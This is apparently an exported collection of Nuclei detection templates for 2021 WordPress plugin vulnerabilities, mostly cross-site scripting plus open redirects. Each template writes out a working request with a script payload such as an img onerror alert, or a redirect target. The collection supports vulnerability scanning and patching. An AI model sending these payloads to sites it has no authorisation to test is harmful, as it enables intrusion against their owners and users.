wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100e300910d515c6736720a43f88bd07fb9e8fe55dfb9476cd2cbcc4c09c1296d6a022100bcc84f726d27a269aa1bc67d9b8f62a6107064085fc4a8f16be9d7a11ae4db38:922c64590222798bb761d5b6d8e72950", "hash": "abc668ece4e203aae380c2c43fb7499b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ec" }, "name": "CVE-2021-25063.yaml", "content": "id: CVE-2021-25063\n\ninfo:\n name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch.\n reference:\n - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25063\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25063\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: cf7skins\n product: contact_form_7_skins\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET 
/wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"' type='hidden\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950", "hash": "1c73b1b830098f47543f067a3f79cb07", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ed" }, "name": "CVE-2021-25065.yaml", "content": "id: CVE-2021-25065\n\ninfo:\n name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.\n impact: |\n An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.19.2\n reference:\n - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc\n - https://wordpress.org/plugins/custom-facebook-feed/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-25065\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.2831\n cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: smashballoon\n product: smash_balloon_social_post_feed\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-facebook-feed/\"\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"custom-facebook-feed\")'\n condition: and\n# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950", "hash": "bbdae920fb97c4ec3bcade78ba5babac", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ee" }, "name": "CVE-2021-25067.yaml", "content": "id: CVE-2021-25067\n\ninfo:\n name: Landing Page Builder < 1.4.9.6 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.4.9.6.\n reference:\n - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc\n - https://wordpress.org/plugins/page-builder-add/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25067\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-25067\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.285\n cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pluginops\n product: landing_page\n framework: wordpress\n tags: 
cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")'\n - 'contains(body_2, \"Enter Page Title\")'\n condition: and\n# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950", "hash": "5345d1c3049d76f6703b301b5c074db7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ef" }, "name": "CVE-2021-25074.yaml", "content": "id: CVE-2021-25074\n\ninfo:\n name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: |\n Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed.\n reference:\n - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25074\n - https://github.com/ARPSyndicate/kenzer-templates\n - 
https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25074\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webp_converter_for_media_project\n product: webp_converter_for_media\n framework: wordpress\n tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950", "hash": "cd880c92c39cc6d295b57402daa89a4c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f0" }, "name": "CVE-2021-25075.yaml", "content": "id: CVE-2021-25075\n\ninfo:\n name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting\n author: DhiyaneshDK\n severity: low\n description: |\n WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. 
The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.5.1.\n reference:\n - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25075\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/kazet/wpgarlic\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 3.5\n cve-id: CVE-2021-25075\n cwe-id: CWE-862\n epss-score: 0.00071\n epss-percentile: 0.28959\n cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: wpdevart\n product: duplicate_page_or_post\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n - |\n GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\n 
Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"style=animation-name:rotation onanimationstart=alert(/XSS/) p\"\n - \"toplevel_page_wpda_duplicate_post_menu\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c669b18178ca28119ca6a8bfc6992e205f34d74494ea204e90aafd87ca6506710221009983c4a067b30c7584b1b513ed5c3e345e4900e97b7e9bc61e0e54a2b0072bbc:922c64590222798bb761d5b6d8e72950", "hash": "6c275f5959694641484450a0029866c5", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f1" }, "name": "CVE-2021-25078.yaml", "content": "id: CVE-2021-25078\n\ninfo:\n name: Affiliates Manager < 2.9.0 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.9.0\n reference:\n - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25078\n - https://plugins.trac.wordpress.org/changeset/2648196\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25078\n cwe-id: CWE-79\n epss-score: 0.00382\n epss-percentile: 0.72505\n cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wpaffiliatemanager\n product: affiliates_manager\n framework: wordpress\n 
tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /?wpam_id=1 HTTP/1.1\n Host: {{Hostname}}\n X-Forwarded-For: \n - |\n GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200 && status_code_3 == 200'\n - 'contains(header_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"Affiliates Manager Click Tracking\")'\n condition: and\n# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950", "hash": "7f3dc882ebad6c55aae084ef03898d23", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f2" }, "name": "CVE-2021-25079.yaml", "content": "id: CVE-2021-25079\n\ninfo:\n name: Contact Form Entries < 1.2.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page\n remediation: Fixed in version 1.1.7\n reference:\n - https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25079\n - https://wordpress.org/plugins/contact-form-entries/\n - https://plugins.trac.wordpress.org/changeset/2629442\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25079\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40882\n cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: crmperks\n product: 
contact_form_entries\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/contact-form-entries/\"\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - \"contains(body_2, '') && contains(body_2, 'contact-form')\"\n condition: and\n# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950", "hash": "e1e1ab7f43d702476038a7eb295ec293", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f3" }, "name": "CVE-2021-25085.yaml", "content": "id: CVE-2021-25085\n\ninfo:\n name: WOOF WordPress plugin - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: |\n The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90\n - 
https://plugins.trac.wordpress.org/changeset/2648751\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25085\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25085\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pluginus\n product: woocommerce_products_filter\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"additional_fields\":[\"\"]}'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f9908167df17fe760df5f1a19699d139a5efbb37c3dedd65ffedf9f786c4860002210085485a2e0ded0fe926fbaeb985991879d0ca1ff02fb398695df4569d41ac1248:922c64590222798bb761d5b6d8e72950", "hash": "61b22a675bb7d9b1f94833fe4da70e7e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f4" }, "name": "CVE-2021-25099.yaml", "content": "id: CVE-2021-25099\n\ninfo:\n name: WordPress GiveWP <2.17.3 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f\n - https://wordpress.org/plugins/give/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25099\n - https://plugins.trac.wordpress.org/changeset/2659032\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25099\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: givewp\n product: givewp\n framework: wordpress\n tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=give_checkout_login&form_id=xxxxxx\">\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"give_user_login\")'\n condition: and\n# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950", "hash": "9ceca683b2fe65adc168e4a7670fc556", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f5" }, "name": "CVE-2021-25104.yaml", "content": "id: CVE-2021-25104\n\ninfo:\n name: WordPress Ocean Extra <1.9.5 - 
Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.9.5.\n reference:\n - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558\n - https://wordpress.org/plugins/ocean-extra/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25104\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25104\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: oceanwp\n product: ocean_extra\n framework: wordpress\n tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/?step=demo&page=owp_setup&a\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'OceanWP'\n - '>'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100e3443b56e8a05c597dc43a2aa8eb67debf30c8d4ae911a0a37658bb837881d2702200e78e6b22e247af5d76f5db33eb488b26dac3e21e943f38a4d4baa45bceb3afd:922c64590222798bb761d5b6d8e72950", "hash": "fada20df23d887b484cf10079a0b9303", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f6" }, "name": "CVE-2021-25111.yaml", "content": "id: CVE-2021-25111\n\ninfo:\n name: WordPress English Admin <1.5.2 - Open Redirect\n author: akincibor\n severity: medium\n description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities.\n remediation: |\n Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25111\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25111\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: english_wordpress_admin_project\n product: english_wordpress_admin\n framework: wordpress\n tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh\"\n\n 
matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950", "hash": "a215f90c09aac1ef88392528e36617e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f7" }, "name": "CVE-2021-25112.yaml", "content": "id: CVE-2021-25112\n\ninfo:\n name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: |\n WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c\n - https://plugins.trac.wordpress.org/changeset/2659751\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25112\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25112\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: i-plugins\n product: whmcs_bridge\n framework: wordpress\n tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins\n\nhttp:\n - 
raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2b074c829e8dc42c189432313efffb7f9da5318f55e319d2755d73408c87795022100dde60a50bcc04205df2039566063b015b72bcc70051c9a54a9c087c20daa5599:922c64590222798bb761d5b6d8e72950", "hash": "afd76173977e5d18b644c37c3bd46cba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f8" }, "name": "CVE-2021-25114.yaml", "content": "id: CVE-2021-25114\n\ninfo:\n name: WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. 
